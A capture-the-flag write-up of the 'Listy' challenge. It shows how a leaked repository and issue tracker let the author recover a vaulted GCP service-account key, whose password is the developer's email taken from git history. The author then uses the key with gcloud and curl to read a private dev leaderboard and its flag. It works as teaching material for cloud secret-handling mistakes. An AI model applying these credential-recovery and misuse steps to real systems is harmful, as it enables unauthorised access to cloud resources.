# Listy  
### 150 points

> I made a little leaderboard listy app, it's a bit rough so please don't
> judge me too harshly.  
>  
> https://listy-web-u7jl3ge7qa-uc.a.run.app/

By visiting the homepage, we can see a simple list with user and score.

![homepage](https://i.imgur.com/6o20tmo.png)

Trying to look deeper in the page won't reveal anything more than the use of
some sort of js framework

By trying to open `robots.txt`, we're greeted with this:  
```  
Disallow: *  
Disallow: /dev #TODO: Separate off dev branch
(https://todo.sr.ht/~listydev/Listy/5)  
```

Now, opening /dev will get us to a 404 page:

![/dev page](https://i.imgur.com/K5uArt8.png)

We can try to open the link in the #TODO comment

![issue list](https://i.imgur.com/6pe7fN4.png)

Here is the issues of this project. Inside the issue #5 (the one linked above)
we can also go to the source of the project.

![sources](https://i.imgur.com/01iaFb0.png)

From there it's clear that is a cloud project created with terraform: a front-
end made with next.js and the api served by a lambda function on gcp.  
And that is using ansible-vault to store the secrets in the file `vault.txt`.

Here are the points that cought the attention  
```sh  
# invoke.sh

#!/bin/bash  
# Ansible-Vault unlock the gcloud credential  
CRED=$(ansible-vault decrypt vault.txt --output /tmp/key.json)  
gcloud auth activate-service-account [email protected]  
#...  
curl -H "Authorization: bearer $(gcloud auth print-identity-token)"
https://us-
central1-sunshine-2022-challenges.cloudfunctions.net/listy\?bucket\=ssctf22-listy-
leaderboard-prod  
```  
```js  
//list.js:19  
//...  
const response = await fetch(`https://us-
central1-${LEADERBOARD_PROJECT}.cloudfunctions.net/${LEADERBOARD_FUNCTION}?bucket=${BUCKET_NAME}`,
{  
headers: {  
Authorization: `bearer ${process.env.GCLOUD_TOKEN}`,  
}  
})  
//...  
```  
```json  
//main.tf  
################################################################  
## Listy Leaderboard Buckets  
################################################################

resource "google_storage_bucket" "listy-leaderboard-prod" {  
name = "ssctf22-listy-leaderboard-prod"  
location = "US"  
force_destroy = true  
}

resource "google_storage_bucket_object" "listy-leaderboard-prod" {  
name = "leaderboard.csv"  
bucket = google_storage_bucket.listy-leaderboard-prod.name  
source = "./leaderboards/leaderboard-prod.csv"  
}

resource "google_storage_bucket" "listy-leaderboard-dev" {  
name = "ssctf22-listy-leaderboard-dev"  
location = "US"  
force_destroy = true  
}

resource "google_storage_bucket_object" "listy-leaderboard-dev" {  
name = "leaderboard.csv"  
bucket = google_storage_bucket.listy-leaderboard-dev.name  
source = "./leaderboards/leaderboard-dev.csv"  
}  
```

Now, it seems that all we have to do is to read the secret and request the
content of the leaderboard-dev, right? We can do this without having to
install ansible with `virtualhold/ansible-vault` image:  
```  
$ docker run --rm -it --entrypoint=/bin/bash virtualhold/ansible-vault  
\---  
$ docker cp vault.txt awesome_wu:/playbook/vault.txt  
\---  
root@0cff51ee3821:/playbook# ansible-vault decrypt vault.txt --output
/tmp/key.json  
Vault password:  
```

But what is the password?

After more time that I'm willing to admit, I've gone back to the issues,
hoping to find a hint on how to solve this.  
And there it was: _Issue #4_  
> ~listydev  
>  
> Currently, I'm just using a local script w/ a vaulted file for storing a
> service account. Maybe pull from the gcloud command natively? For now I'm
> just vaulting with my email to keep secrets scanners from bugging me.

Having access to the repo, we can easily get the user email from the commit
history. A `git clone` later and here we are:  
```  
~/sunshine22/listy/Listy$ git log  
commit 3f9c3f2c557aa81f7423d70f0a3252536e4a1f85 (HEAD -> master,
origin/master, origin/HEAD)  
Author: Listy Dev <[email protected]>  
Date: Wed Nov 2 22:23:05 2022 -0600

static stuff  
```

From now on, it's all downhill. We just have to install the google-cloud-cli
(or use another container) to obtain a valid token and we can get the flag!

```  
root@0cff51ee3821:/playbook# ansible-vault decrypt vault.txt --output
/tmp/key.json  
Vault password: [email protected]  
Decryption successful

root@0cff51ee3821:/playbook# cat /tmp/key.json  
{  
"type": "service_account",  
"project_id": "sunshine-2022-challenges",  
"private_key_id": ...  
}

root@0cff51ee3821:/playbook# gcloud auth activate-service-account listy-
developer@sunshine-2022-challenges.iam.gserviceaccount.com '--key-
file=/tmp/key.json'  
Activated service account credentials for: [listy-
developer@sunshine-2022-challenges.iam.gserviceaccount.com]

root@0cff51ee3821:/playbook# curl -H "Authorization: bearer $(gcloud auth
print-identity-token)" https://us-
central1-sunshine-2022-challenges.cloudfunctions.net/listy\?bucket\=ssctf22-listy-
leaderboard-dev

[{"rank":1,"username":"Bill","points":100},{"rank":2,"username":"SpongeBob","points":50},{"rank":3,"username":"sun{5erver1e55-9cp-i5-9re@+}","points":50}]

```

Original writeup
(https://gist.github.com/SalScotto/d855c77d07907f9768656e64a27b6887).